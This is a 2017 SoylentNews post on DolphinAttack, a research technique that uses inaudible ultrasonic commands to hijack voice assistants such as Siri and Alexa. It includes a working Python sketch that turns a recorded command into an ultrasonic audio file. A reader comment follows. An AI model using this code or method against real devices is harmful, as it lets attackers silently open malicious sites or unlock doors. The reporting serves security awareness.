
posted by Fnord666 on Thursday September 07 2017, @01:46PM
from the careless-whispers dept.

Submitted via IRC for SoyCow1937

Hacks are often caused by our own stupidity, but you can blame tech companies for a new vulnerability. Researchers from China's Zhejiang University found a way to attack Siri, Alexa and other voice assistants by feeding them commands at ultrasonic frequencies. Those are too high for humans to hear, but they're perfectly audible to the microphones in your devices. With the technique, researchers could get the AI assistants to open malicious websites and even unlock your door if you had a smart lock connected.

The relatively simple technique is called DolphinAttack. The researchers first translated human voice commands into ultrasonic frequencies (over 20,000 Hz), then simply played them back from a regular smartphone equipped with an amplifier, ultrasonic transducer and battery -- less than $3 worth of parts.
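Mechanically, the "translation" is amplitude modulation: the spoken command becomes the baseband signal and is shifted onto an ultrasonic carrier, and the inherent nonlinearity of the target device's microphone demodulates it back into the audible band before it ever reaches the speech recognizer. Below is a minimal Python sketch of that modulation step; the filenames, the 25 kHz carrier and the NumPy/SciPy tooling are illustrative assumptions, not the researchers' actual code.

import numpy as np
from scipy.io import wavfile

CARRIER_HZ = 25_000   # carrier above the ~20 kHz ceiling of human hearing
OUT_RATE = 192_000    # output sample rate high enough to represent the carrier

# Hypothetical mono recording of the spoken command.
rate, voice = wavfile.read("command.wav")
voice = voice.astype(np.float64)
voice /= np.max(np.abs(voice))          # normalize to [-1, 1]

# Resample the baseband command up to the output rate.
t_in = np.arange(len(voice)) / rate
t_out = np.arange(int(len(voice) * OUT_RATE / rate)) / OUT_RATE
baseband = np.interp(t_out, t_in, voice)

# Standard AM: carrier plus double-sideband signal. A microphone's
# nonlinearity effectively squares what it receives, which drops a
# copy of the baseband back into the audible range.
carrier = np.cos(2 * np.pi * CARRIER_HZ * t_out)
modulated = 0.5 * (1.0 + baseband) * carrier

wavfile.write("ultrasonic_command.wav", OUT_RATE, modulated.astype(np.float32))

Played through a transducer that can reproduce 25 kHz, the resulting file is silent to a human listener but, after demodulation in the microphone, sounds like the original command to the assistant.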

What makes the attack scary is the fact that it works on just about anything: Siri, Google Assistant, Samsung S Voice and Alexa, on devices like smartphones, iPads, MacBooks, the Amazon Echo and even an Audi Q3 -- 16 devices and seven systems in total. What's worse, "the inaudible voice commands can be correctly interpreted by the SR (speech recognition) systems on all the tested hardware." Suffice it to say, it works even if the attacker has no access to the device and the owner has taken the usual security precautions.

Source: https://www.engadget.com/2017/09/06/alexa-and-siri-are-vulnerable-to-silent-nefarious-commands/


Original Submission

 
  • (Score: 3, Interesting) by nobu_the_bard (6373) on Thursday September 07 2017, @04:22PM (#564635)

    Heh. It doesn't even matter if people are abusing it intentionally...

    The other day Google overheard something we were talking about when a friend left their phone on the table and walked away. The phone apparently misinterpreted something we said as something like "Google, read my latest email" and read a very personal email out loud to us. We were very surprised and confused (nobody had even noticed the phone was there or that it was accepting voice commands); it was pretty embarrassing for everyone...

    *Note: I only think it was Google. I didn't hear the first part and the friend quickly stuffed the phone into his pocket and we all silently decided to pretend it didn't happen.
